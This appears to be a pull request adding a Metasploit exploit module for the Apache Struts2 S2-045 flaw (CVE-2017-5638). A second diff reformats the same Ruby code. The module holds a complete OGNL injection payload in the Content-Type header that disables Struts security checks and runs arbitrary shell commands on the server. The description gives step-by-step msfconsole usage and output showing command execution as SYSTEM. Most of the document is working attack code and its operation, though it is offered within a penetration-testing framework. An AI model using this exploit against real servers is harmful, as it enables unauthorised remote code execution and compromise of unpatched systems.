### PR TITLE
Apache Struts2 S2-045 Exploit (CVE-2017-5638)

### DIFF
--- a/modules/exploits/multi/http/struts2_s2045_rce.rb
+++ b/modules/exploits/multi/http/struts2_s2045_rce.rb
@@ -1,0 +1,89 @@
+
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+    Rank = ExcellentRanking
+    include Msf::Exploit::Remote::HttpClient
+
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache Struts2 S2-045 Remote Code Execution Exploit(CVE-2017-5638)',
+      'Description'    => %q{
+          It is possible to perform a RCE attack with a malicious Content-Type value.If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user.Discoverd By Nike.Zheng.
+      },
+      'Author'         => [ 'MSF Module: Chorder(http://chorder.net)'],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2017-5638']
+        ],
+      'Privileged'     => true,
+      'Platform'      => %w{ linux win },
+      'Arch'           => 'x86',
+      'DefaultOptions' =>{
+          'CMD' => 'whoami'
+        },
+      'Targets'        =>
+        [
+          ['Windows Universal',
+            {
+                'Arch' => ARCH_X86,
+                'Platform' => 'win',
+                'CmdStagerFlavor' => 'tftp'
+            }
+          ],
+          ['Linux Universal',
+            {
+                'Arch' => ARCH_X86,
+                'Platform' => 'linux'
+            }
+          ],
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Mar 06 2017'))
+      
+      register_options(
+        [
+          Opt::RPORT(8080),
+          OptString.new('URI', [ true, 'The path to a struts application action ie. /struts2.action', ""]),
+          OptString.new('CMD', [ true, 'Execute this command instead of using command stager', "" ])
+        ], self.class)
+  end
+
+
+  def execute_command(cmd, opts = {})
+    uri =   normalize_uri( datastore['URI'] )
+    headers ={
+        "Content-Type"=>"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+cmd+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
+    }
+    data = '----------1529557865\r\n\Content-Disposition: form-data; name="file"; filename="test.txt"\r\n\000'
+    print_status("Target URI: #{uri}")
+    print_status("Attempting to execute: #{cmd}")
+
+    resp = send_request_raw({
+      'host'    => rhost,
+      'port'    => rport,
+      'uri'     => uri,
+      'version' => '1.1',
+      'method'  => 'POST',
+      'headers' => headers,
+      'data'    => data,
+    }, 5)
+    print_status( resp.body )
+  end
+
+
+
+  def exploit
+    unless datastore['CMD'].blank?
+      print_status("Executing Command...")
+      execute_command(datastore['CMD'])
+      return
+    end
+    handler
+    
+  end
+
+end

--- a/modules/exploits/multi/http/struts2_s2045_rce.rb
+++ b/modules/exploits/multi/http/struts2_s2045_rce.rb
@@ -1,89 +1,76 @@
-
-
 require 'msf/core'
 
 class MetasploitModule < Msf::Exploit::Remote
     Rank = ExcellentRanking
     include Msf::Exploit::Remote::HttpClient
 
-
-  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Apache Struts2 S2-045 Remote Code Execution Exploit(CVE-2017-5638)',
-      'Description'    => %q{
-          It is possible to perform a RCE attack with a malicious Content-Type value.If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user.Discoverd By Nike.Zheng.
-      },
-      'Author'         => [ 'MSF Module: Chorder(http://chorder.net)'],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
-          [ 'CVE', '2017-5638']
-        ],
-      'Privileged'     => true,
-      'Platform'      => %w{ linux win },
-      'Arch'           => 'x86',
-      'DefaultOptions' =>{
-          'CMD' => 'whoami'
-        },
-      'Targets'        =>
-        [
-          ['Windows Universal',
-            {
-                'Arch' => ARCH_X86,
-                'Platform' => 'win',
-                'CmdStagerFlavor' => 'tftp'
-            }
-          ],
-          ['Linux Universal',
-            {
-                'Arch' => ARCH_X86,
-                'Platform' => 'linux'
-            }
-          ],
-        ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => 'Mar 06 2017'))
-      
-      register_options(
-        [
-          Opt::RPORT(8080),
-          OptString.new('URI', [ true, 'The path to a struts application action ie. /struts2.action', ""]),
-          OptString.new('CMD', [ true, 'Execute this command instead of using command stager', "" ])
-        ], self.class)
-  end
-
-
-  def execute_command(cmd, opts = {})
-    uri =   normalize_uri( datastore['URI'] )
-    headers ={
-        "Content-Type"=>"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+cmd+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
-    }
-    data = '----------1529557865\r\n\Content-Disposition: form-data; name="file"; filename="test.txt"\r\n\000'
-    print_status("Target URI: #{uri}")
-    print_status("Attempting to execute: #{cmd}")
-
-    resp = send_request_raw({
-      'host'    => rhost,
-      'port'    => rport,
-      'uri'     => uri,
-      'version' => '1.1',
-      'method'  => 'POST',
-      'headers' => headers,
-      'data'    => data,
-    }, 5)
-    print_status( resp.body )
-  end
-
-
-
-  def exploit
-    unless datastore['CMD'].blank?
-      print_status("Executing Command...")
-      execute_command(datastore['CMD'])
-      return
+    def initialize(info = {})
+        super(update_info(info,
+            'Name'           => 'Apache Struts2 S2-045 Remote Code Execution Exploit(CVE-2017-5638)',
+            'Description'    => %q{It is possible to perform a RCE attack with a malicious Content-Type value.If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user.Discoverd by Nike.Zheng.
+            },
+            'Author'         => [ 'Exploit: Nike.Zheng','MSF Module: Chorder(http://chorder.net)'],
+            'License'        => MSF_LICENSE,
+            'References'     => [ [ 'CVE', '2017-5638'] ],
+            'Privileged'     => true,
+            'Platform'       => %w{ linux win },
+            'Arch'           => 'x86',
+            'DefaultOptions' =>{
+                'CMD' => 'whoami'
+            },
+            'Targets'        =>[
+                ['Windows Universal',
+                    {
+                        'Arch' => ARCH_X86,
+                        'Platform' => 'win',
+                        'CmdStagerFlavor' => 'tftp'
+                    }
+                ],
+                ['Linux Universal',
+                    {
+                        'Arch' => ARCH_X86,
+                        'Platform' => 'linux'
+                    }
+                ],
+            ],
+            'DefaultTarget'  => 0,
+            'DisclosureDate' => 'Mar 06 2017'))
+            register_options(
+            [
+                Opt::RPORT(8080),
+                OptString.new('URI', [ true, 'The path to a struts application action ie. /struts2.action', ""]),
+                OptString.new('CMD', [ true, 'Execute this command instead of using command stager', "" ])
+            ], self.class)
     end
-    handler
-    
-  end
 
+
+    def execute_command(cmd, opts = {})
+        uri =   normalize_uri( datastore['URI'] )
+        headers ={
+            "Content-Type"=>"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+cmd+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
+        }
+        data = '----------1529557865\r\n\Content-Disposition: form-data; name="file"; filename="test.txt"\r\n\000'
+        print_status("Target URI: #{uri}")
+        print_status("Attempting to execute: #{cmd}")
+
+        resp = send_request_raw({
+            'host'    => rhost,
+            'port'    => rport,
+            'uri'     => uri,
+            'version' => '1.1',
+            'method'  => 'POST',
+            'headers' => headers,
+            'data'    => data,
+        }, 5)
+        print_status( resp.body )
+    end
+
+    def exploit
+        unless datastore['CMD'].blank?
+            print_status("Executing Command...")
+            execute_command(datastore['CMD'])
+            return
+        end
+        handler
+    end
 end


### PR DESCRIPTION
Apache struts2 has published a new vuln these days,this is the exploit for that.
Vuln details: https://cwiki.apache.org/confluence/display/WW/S2-045

## Verification

- [ ] `msfconsole`
- [ ] `use exploit/multi/http/struts2_s2045_rce`
- [ ] `set rhost x.x.x.x`
- [ ] `set rport 8080`
- [ ] `set uri /path_to/target.action`
- [ ] `set payload windows/exec`
- [ ] `set cmd whoami`
- [ ] `exploit`

`msf exploit(struts2_s2045_rce) > set rhost *.*.*.*`
`rhost => *.*.*.*`
`msf exploit(struts2_s2045_rce) > set rport 8080`
`rport => 8080`
`msf exploit(struts2_s2045_rce) > set uri /path_to/target.action`
`uri => /path_to/target.action`
`msf exploit(struts2_s2045_rce) > set payload windows/exec`
`payload => windows/exec`
`msf exploit(struts2_s2045_rce) > set cmd whoami`
`cmd => whoami`
`msf exploit(struts2_s2045_rce) > exploit`
`[*] Executing Command...`
`[*] Target URI: /path_to/target.action`
`[*] Attempting to execute: whoami`
`[*] win-server\system`
`[*] Exploit completed, but no session was created.`

Carefully Enjoy!